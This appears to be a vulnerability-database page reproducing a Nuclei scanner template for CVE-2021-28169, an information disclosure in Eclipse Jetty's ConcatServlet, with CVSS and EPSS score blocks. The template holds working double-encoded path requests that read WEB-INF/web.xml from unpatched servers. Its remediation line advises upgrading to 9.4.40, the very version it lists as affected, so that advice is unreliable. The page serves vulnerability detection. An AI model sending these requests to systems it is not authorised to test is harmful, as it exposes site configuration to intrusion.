Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-28169
HistoryJun 24, 2021 - 4:00 p.m.

Eclipse Jetty ConcatServlet - Information Disclosure

2021-06-2416:00:02
ProjectDiscovery
github.com
8

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

6 Medium

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.006 Low

EPSS

Percentile

78.6%

Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure.  Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2021-28169

info:
  name: Eclipse Jetty ConcatServlet - Information Disclosure
  author: pikpikcu
  severity: medium
  description: |
    Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure.  Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.
  remediation: |
    Upgrade to Eclipse Jetty version 9.4.40 or later to mitigate this vulnerability.
  reference:
    - https://twitter.com/sec715/status/1406787963569065988
    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
    - https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-28169
    - https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-28169
    cwe-id: CWE-200,NVD-CWE-Other
    epss-score: 0.00401
    epss-percentile: 0.70865
    cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: eclipse
    product: jetty
  tags: cve2021,cve,jetty,eclipse

http:
  - method: GET
    path:
      - "{{BaseURL}}/static?/%2557EB-INF/web.xml"
      - "{{BaseURL}}/concat?/%2557EB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/xml"

      - type: word
        part: body
        words:
          - "</web-app>"
          - "java.sun.com"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210099d1285740ade18a2d452515bacddf15f7433c6ef658f2b8640ed13791476a7e022048d15f48ee10c490f6696a29b8999737d08894c5770fc0d7973844f075ce1238:922c64590222798bb761d5b6d8e72950

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

6 Medium

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.006 Low

EPSS

Percentile

78.6%